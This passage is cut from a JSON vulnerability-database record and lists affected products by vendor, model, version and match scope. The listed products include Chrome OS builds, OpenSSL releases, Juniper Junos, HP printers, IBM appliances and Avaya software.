"scope": "eq", "trust": 0.3, "vendor": "rim", "version": "1.2" }, { "model": "msr20-1x family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.77" }, { "model": "8.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.17" }, { "model": "one-x mobile ces for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.4" }, { "model": "system x3650m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54541.42" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0.7" }, { "model": "physical access gateways", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "cognos insight standalone", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "session border controller enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.4" }, { "model": "junos 11.4r5-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ive os 8.0r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89410" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "isoc v200r001c01spc101", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.13" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.36" }, { "model": "junos os 12.1x44-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "watson explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0" }, { "model": "fortiweb", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.3.1" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.114" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.8.106" }, { "model": "lifetime key management software", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "vcenter converter standalone", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "color laserjet cm4730 multifunction printer cb482a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "50.286.1" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.95" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.22" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "horizon workspace server gateway", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8.1" }, { "model": "documentum content server p06", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.89" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "junos 12.1r8-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.07" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.56" }, { "model": "laserjet multifunction printer series q3945a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "43459.310.2" }, { "model": "websphere datapower xml accelerator xa35", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.15" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "executive scorecard", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.5" }, { "model": "bladesystem c-class onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.21" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.14" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.0.4" }, { "model": "isoc v200r001c00spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "60000" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "small business isa500 series integrated security appliances", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.1" }, { "model": "integrated management module ii", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.21" }, { "model": "netiq identity server", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "color laserjet enterprise cp4525 cc495a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.164.1" }, { "model": "junos 12.3r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.80" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.5.2" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.9.107" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "laserjet enterprise mfp m630 series b3g84a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.4" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "arubaos", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "6.3" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "vcsa", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "color laserjet enterprise m750 d3l10a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.27" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.170" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "idp 4.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "horizon workspace client for windows", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.20" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.1" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "laserjet m3035 multifunction printer cc476a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "laserjet enterprise flow m830z mfp cf367a 2302963 436071", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "usg9500 usg9500 v300r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5750" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "config advisor", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "color laserjet cm4540 mfp cc420a 2302963 436067", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "color laserjet enterprise cp4525 cc494a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.164.1" }, { "model": "laserjet enterprise mfp m725 cf067a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "color laserjet printer series q7492a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "470046.230.6" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.9" }, { "model": "eucalyptus", "scope": "eq", "trust": 0.3, "vendor": "eucalyptus", "version": "4.0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "uma v200r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "color laserjet m680 cz249a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "laserjet m3035 multifunction printer cc477a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "isoc v200r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "fortimanager", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.2" }, { "model": "simatic wincc oa", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "3.12" }, { "model": "forticlient", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.10" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.22" }, { "model": "eupp v100r001c10spc002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.0" }, { "model": "websphere datapower low latency appliance xm70", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.15" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos insight standalone fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "oncommand balance", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "f1000a and s family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "stunnel", "scope": "ne", "trust": 0.3, "vendor": "stunnel", "version": "5.02" }, { "model": "u200a and m family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.57" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.6" }, { "model": "flex system fc5022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "850/8700" }, { "model": "officejet enterprise color c2s12a 2302963 436074", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "x555" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70000" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.2.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.11" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.4.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "oceanstor s5500t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.66" }, { "model": "junos d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "color laserjet cm4540 mfp cc419a 2302963 436067", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.3" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.31" }, { "model": "vcenter converter standalone", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "infosphere master data management patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.4" }, { "model": "hsr6602 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "wag310g wireless-g adsl2+ gateway with voip", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "documentum content server p07", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "security threat response manager", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.1" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "unified wireless ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "29200" }, { "model": "one-x mobile for blackberry", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.5" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.50" }, { "model": "9.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.14" }, { "model": "laserjet m4345 multifunction printer cb425a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.6" }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.07" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "ida pro", "scope": "eq", "trust": 0.3, "vendor": "hex ray", "version": "6.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4x27.44" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.22" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "color laserjet m651 cz255a 2302963 436073", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "si switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51200" }, { "model": "scanjet enterprise document capture workstation l2717a 2302963 436065", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8500" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.19" }, { "model": "laserjet p4015 cb510a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.99" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.168" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "cloudsystem foundation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "9.0-rc3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 13.3r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.41" }, { "model": "junos 12.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx4004-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "vcd", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.6.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "smart call home", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "elan", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "8.3.3" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.0.1" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.3" }, { "model": "laserjet enterprise color mfp m575dn cd645a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5000" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "system x3250m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "42511.42" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.3" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "laserjet enterprise m806 cz245a 2302963 436075", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.0" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.4" }, { "model": "suse core for", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9x86" }, { "model": "ecns610 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "junos 13.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "documentum content server sp1", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "horizon workspace server data", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8.1" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025308" }, { "model": "9.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.81" }, { "model": "storage encryption", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.4" }, { "model": "laserjet m3027 multifunction printer cb416a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.99" }, { "model": "junos 12.3r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.108" }, { "model": "xenclient enterprise", "scope": "ne", "trust": 0.3, "vendor": "citrix", "version": "5.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "laserjet enterprise mfp m630 series b3g84a 2303714 233000041", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "netscaler ipmi/lom interface", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "msr20 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "colorqube ps", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "85704.76.0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.9" }, { "model": "oceanstor s6800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "color laserjet m680 cz249a 2302963 436072", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.62" }, { "model": "servicecenter", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "bladesystem c-class virtual connect", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.30" }, { "model": "sparc m10-4s", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "fortiauthenticator build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "3.1.060" }, { "model": "laserjet enterprise m601 series ce990a 2302963 436082", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "600" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129000" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "vcenter support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.14" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0" }, { "model": "sbr carrier 7.6.0-r10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.56" }, { "model": "hsr6800 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "laserjet printer series q7552a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52008.241" }, { "model": "scanjet enterprise document capture workstation l2717a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "85000" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.39" }, { "model": "clearpass", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "6.3.0" }, { "model": "bladecenter js23/js43", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x)0" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "4.3" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "security network intrusion 